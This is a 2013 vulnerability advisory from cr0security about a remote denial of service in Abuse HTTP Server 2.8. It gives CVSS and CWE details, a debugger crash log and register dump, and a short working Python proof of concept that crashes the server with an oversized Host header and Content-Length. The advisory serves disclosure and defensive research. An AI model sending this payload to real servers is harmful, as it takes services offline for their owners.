Abuse HTTP Server 2.8 Denial Of Service

`Advisory Information :  
======================  
Title : Abuse HTTP Server 2.8 - Remote Denial Of Service  
Advisory ID : Cr02013-002  
Product : HTTP Server  
Vendor : SmartUX  
Vulnerable Version(s) : 2.8 and probably prior release  
Tested Version : 2.8  
Tested On : Windows XP, Windows 7  
Vulnerability Type / CWE ID : Improper Resource Shutdown or Release / [CWE-404]  
Risk Level : High  
CVSSv2 Base Score : 9.7 (AV:N/AC:L/Au:N/C:N/I:P/A:C/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:L/IR:L/AR:H)  
Discovered By : Zico (Zee Eichel) Ekel of cr0security - zee[at]cr0security.com - http://www.cr0security.com  
  
  
Introduction :  
==============  
  
Abuse HTTP Server is a small program designed to become a WebServer.  
  
- Based on / Copied from : http://abuse-httpd.sourceforge.net/  
  
  
Advisory Details:  
=================  
Abuse HTTP Server suffers from Remote Denial Of Service (DOS). The Attacker could make Abuse HTTP Server disconnect connection while client is connected to Abuse HTTP server.  
  
  
Proof Of Concept :  
==================  
The Attacker run this remote exploit DOS code targeted to remote server host,  
and the connection between server and android client will be disconected or terminated.  
  
With debugging (Log-using ollydbg) :  
  
Log data, item 3  
Address=7C8106E9 (crash address)  
Message=New thread with ID 000006D0 created  
Log data, item 2  
Message=Thread 000006D0 terminated, exit code 0  
Log data, item 1  
Message=Thread 00000794 terminated, exit code CB (203.)  
Log data, item 0  
Message=Process terminated, exit code CB (203.)  
  
Register FPU log :  
  
EAX 00000000  
ECX 7C800000 kernel32.7C800000  
EDX 7C97B120 ntdll.7C97B120  
EBX 00000000  
ESP 0012EDD4  
EBP 0012EED0  
ESI 7C90DE50 ntdll.ZwTerminateProcess  
EDI 000000CB  
EIP 7C90E4F4 ntdll.KiFastSystemCallRet  
C 0 ES 0023 32bit 0(FFFFFFFF)  
P 1 CS 001B 32bit 0(FFFFFFFF)  
A 0 SS 0023 32bit 0(FFFFFFFF)  
Z 1 DS 0023 32bit 0(FFFFFFFF)  
S 0 FS 003B 32bit 7FFDE000(FFF)  
T 0 GS 0000 NULL  
D 0  
O 0 LastErr ERROR_CLASS_HAS_WINDOWS (00000584)  
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)  
ST0 empty -??? FFFF 00FF00FF 00FF00FF  
ST1 empty -??? FFFF 00FF00FF 00FF00FF  
ST2 empty -??? FFFF 00FE00B2 006E007A  
ST3 empty -??? FFFF 00FE00B2 006B0077  
ST4 empty -NAN FFFF FFB36B77 FFB36E7A  
ST5 empty -??? FFFF 00FF00B3 006B0077  
ST6 empty -??? FFFF 00000000 00000000  
ST7 empty -??? FFFF 00800080 00800080  
3 2 1 0 E S P U O Z D I  
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)  
FCW 1372 Prec NEAR,64 Mask 1 1 0 0 1 0  
  
SEH chain of main thread:  
  
Address SE handler  
0012FC50 kernel32.7C839AC0  
0012FCA8 Abuse.0040D7E3  
0012FD78 USER32.7E44048F  
0012FDD8 USER32.7E44048F  
0012FEF0 USER32.7E44048F  
0012FF50 USER32.7E44048F  
0012FFE0 kernel32.7C839AC0  
  
Sample dummy tool for disconected only  
======================================  
  
--- Python Remote DOS code ---  
  
#!/usr/bin/python  
  
import socket  
import os  
import sys  
  
crash = "0" * 504  
  
buffer="GET / HTTP/1.1\r\n"  
buffer+="Host: " + crash + "\r\n"  
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"  
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"  
buffer+="Content-Length : 1048580\r\n\r\n"  
  
print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com"  
print "[*] Change some option in code with your self"  
print "[*] Connect to host and send payload"  
  
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )  
expl.connect(("192.168.1.101", 80))  
expl.send(buffer)  
print "[*] Server Disconected"  
expl.close()  
  
------------- EOF -------------  
  
Report-Timeline :  
=================  
29/09/2013 : Vendor Contacted / No response.  
30/09/2013 : Public Disclosure.  
  
  
Remediation :  
=============  
There isn't remediation step from the Vendor until this Public Disclosure.  
  
  
References :  
============  
- Common Weakness Enumeration (CWE) - http://cwe.mitre.org  
- Share KM - http://abuse-httpd.sourceforge.net/  
  
  
About Cr0security :  
===================  
Cr0security is a company that moved on "Information and Technologies" especially  
on Computer Security System, Network Security, and Secure Computer Application  
Development. with a reference to the publics needs of using the information system  
technology with better security, Cr0security ready to help you to reach secure point  
and creating a comfortable moment while you are perform any activities through your  
networks or computers at once. In computer software development we also implement the  
"Secure Programming". so security of the applications, the data, and the computer will  
be strictly maintained. Beside we can act as your Consultant, We can act as your partner  
to achieve the best solution.  
  
  
Contact Cr0security :  
=====================  
Email : info[at]cr0security.com  
Website : http://www.cr0security.com  
  
  
Disclaimer :  
============  
The information provided in this advisory is provided "as is" without warranty  
of any kind. Cr0security disclaims all warranties, either express or implied,  
including the warranties of merchantability and fitness for a particular purpose.  
In no event shall Cr0security or its suppliers be liable for any damages whatsoever  
including direct, indirect, incidental, consequential, loss of business profits or  
special damages, even if Cr0security or its suppliers have been advised of the  
possibility of such damages. Some states do not allow the exclusion or limitation  
of liability for consequential or incidental damages so the foregoing limitation may  
not apply.  
`